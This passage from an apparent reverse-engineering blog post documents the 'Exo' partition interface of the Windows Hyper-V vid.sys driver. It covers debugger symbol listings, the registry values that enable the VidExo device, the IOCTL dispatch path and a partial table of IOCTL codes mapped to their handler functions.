<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExopDeviceSetupInternal</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExopRegKeyNotificationHandler</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExopFileCreate</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExoVpStopCompleteMessageCallback</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExoIoControlPartition</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExoFastIoControlDriver</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"><br /></span></span>
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExoCurrentProcessIsAccessAllowed</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExoPartitionInitialize</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"><br /></span></span>
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VsmmNtSlatExoGpaAccessVaFault</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VsmmExoGpaRangeIoctlUnmap</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VsmmExoGpaRangeIoctlAccessTrackingControl</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VsmmExoTranslateGuestVirtualAddress</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExoDeviceContext</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"><br /></span></span>
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExoInterceptsHandlePassthrough</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VsmmExoGpaRangeIoctlMap</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VsmmExoHandleMemoryIntercept</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidInformationIoctlExoGetSystemInformation</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExoFastIoControlPartition</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExoIoControlDriver</span></span><br />
<div>
<br /></div>
</div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">0: kd> x /1 vid!*exo*</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"><br /></span></span>
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExopIoControlPreProcess</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExopFileClose</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExopFileObjectDestroy</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExopUpdateDeviceSecurity</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExopFileCleanup</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"><br /></span></span>
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"><br /></span></span>
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExopFileCreate</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"><br /></span></span>
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExoIoControlPartition</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExoFastIoControlDriver</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExoDeviceTeardown</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExoCurrentProcessIsAccessAllowed</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExoPartitionInitialize</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VsmmGpaRangeIoctlExoCreateSpecifyUserVa</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"><br /></span></span>
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"><br /></span></span>
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"><br /></span></span>
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"><br /></span></span>
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExoDeviceContext</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExoDeviceSetup</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"><br /></span></span>
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"><br /></span></span>
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"><br /></span></span>
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"><br /></span></span>
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExoFastIoControlPartition</span></span><br />
<div>
<br /></div>
</div>
</td></tr>
</tbody></table>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">There are two values in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Vid\Parameters key</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"><br /></span></span>
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"> ExoDeviceEnabled</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"> ExoDeviceEnabledClient</span></span><br />
<div>
<br /></div>
</div>
</div>
<div style="text-align: left;">
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block;"><img height="75" src="https://lh5.googleusercontent.com/vyOanNVy9nrtHj7ypBTYbIeWqQtVcGCFQaHBVrJXHCtrJ3gAcemekMkQzPi59fkcr1r7ySLLGacVAN4J8GJJ-SuZN6unsNpDnNO58Xxxmh3efOOjB03vdE_As47p0jKGQeYNH1S1ASg8mtkzJg" style="margin-left: 0px; margin-top: 0px;" width="461" /></span></span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If both are zero, nothing happened, but if one of them is changed, Vid.sys!VidExopRegKeyNotificationHandler immediately starts to work (it was early registered using nt!ZwNotifyChangeKey).</span><br />
<span style="font-family: "calibri" , sans-serif; font-size: 10.6667px;"><br /></span>
<span style="font-family: "calibri" , sans-serif; font-size: 10.6667px;">If one of variables equivalent 1, then vid.sys!VidExopDeviceSetupInternal function is executed, created device object \Device\VidExo and SymbolicLink \DosDevices\VidExo and registered handler functions:</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"><br /></span></span>
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">VidExopFileCreate</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">VidExopFileClose</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">VidExopFileCleanup</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"><br /></span></span>
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">VidExopIoControlPreProcess </span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">VidIoControl</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"><br /></span></span>
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Separate handlers for fast I\O:</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"><br /></span></span>
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">VidExoFastIoControlPartition</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">VidExoFastIoControlDriver</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"><br /></span></span>
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Function is finished by calling VidObjectHeaderInitialize(VidExoDeviceContext, ' oxE')</span></span><br />
<div>
<br /></div>
</div>
</div>
<div style="text-align: left;">
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vid.sys!VidExopIoControlPreProcess – function, that is used to process IOCTL requests, sending to the VidExo object, the vid.sys!VidIoControlPreProcess function is called from it, first parameter of which is transferred to the VM_PROCESS_CONTEXT structure. If VM_PROCESS_CONTEXT contains “Prtn” signature, then VidExoIoControlPartition will be executed, if “Exo”, then vid.sys!VidExoIoControlDriver (it calls winhvr!WinHvGetSystemInformation with certain parameters, however, I did not encounter the case when this function is executed, because exo-object is not partition object). Accordingly, even in the case of working with the WHVP API, almost all work is carried out with a Prtn-object.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next functions can be called from vid.sys!VidExoIoControlPartition:</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidIoControlPartition</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvInstallIntercept</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetLocalInterruptControllerState</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetLocalInterruptControllerState</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VsmmExoGpaRangeIoctlAccessTrackingControl</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VsmmExoGpaRangeIoctlUnmap</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VsmmExoGpaRangeIoctlMap</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vid.sys!VidIoControlPartition can handle limited IOCTL queries for EXO partitions.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="margin-left: -5.4pt; text-align: left;">
<table style="border-collapse: collapse; border: none; text-align: left;"><colgroup><col width="191"></col><col width="206"></col><col width="226"></col></colgroup><tbody>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">IOCTL</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Функция</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Подфункции (для информации)</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x221184</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidVpIoctlStart</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidMessageSlotCancelWait, no winhv call</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x221034</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VsmmDoorbellCreateEntry</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvAllocatePortId, WinHvCreatePort, WinHvConnectPort</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x2210BC</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetXsaveData</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x2210D0</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidHvStatsIoctlPageMapLocal</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidClientBufferInitialize, VidClientBufferShare</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x2210D4</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidHypercallDoorbellIoctlMap</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidClientBufferShare</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x2210DC</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidVpLookup, VidClientBufferShare</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x2210F0</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidMessageSlotMap</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidVpLookup</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x221134</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidCpuidResultRegister</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvRegisterInterceptResult</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
